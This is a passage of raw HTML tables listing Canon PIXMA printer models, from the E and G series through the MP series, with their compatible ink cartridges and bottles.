width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td 